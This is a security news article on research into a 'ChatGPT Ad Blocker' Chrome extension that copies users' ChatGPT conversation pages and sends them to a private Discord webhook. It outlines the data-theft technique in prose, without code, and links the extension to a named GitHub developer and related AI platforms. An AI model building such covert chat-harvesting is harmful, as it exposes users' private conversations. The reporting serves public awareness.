“ChatGPT Ad Blocker” Extension Caught Harvesting Your Private Conversations

As OpenAI shifts toward serving advertisements to users on its free tier, a new wave of opportunistic threats is emerging. A recent investigation by DomainTools has unmasked a malicious Chrome extension that capitalizes on this policy change, masquerading as a helpful utility while systematically harvesting sensitive user data.

The extension, aptly named “ChatGPT Ad Blocker,” was discovered on the Google Chrome Web Store, where it lured users with the promise of a “free and lightweight” way to “Stop the Ads. Keep the AI”.

Despite its marketing, the primary goal of the extension is not privacy—it is data harvesting. Once installed, the extension injects a script into the user’s browser that clones the entire ChatGPT conversation page.

The technical process is efficient:

• DOM Cloning: The extension clones the entire HTML body of the active ChatGPT page.
• Sanitization (with a twist): While it removes rendering elements like styles and images, it deliberately preserves the text and structure of the conversation.
• Selective Redaction: It only redacts text nodes longer than 150 characters, ensuring that most standard user prompts and AI responses remain fully intact.

The captured data, which includes full prompts, metadata, and the UI state, is bundled into a “page dump” and sent to a private Discord channel via a hardcoded webhook.

“The extension… is primarily designed to steal the user’s ChatGPT conversations data by systematically copying the HTML page and sending it to a webhook on a private Discord channel,” the report warned.

Researchers found that the extension even uses a bot named “Captain Hook” to receive the exfiltrated data. This setup allows the attacker to maintain a persistent, organized stream of stolen intellectual property and personal information.

The extension is linked to the GitHub ID krittinkalra, a persona also associated with larger AI platforms like AI4ChatCo and Writecream. This connection raises significant red flags for the broader AI community.

Writecream and AI4ChatCo claim to serve over 1.5 million users worldwide, offering everything from advanced chatbots to marketing content generation. The discovery of JavaScript malware in the developer’s “Ad Blocker” project has led researchers to ask a critical question: “It begs the question, is there similar user data theft, privacy violations, and malware in those apps?”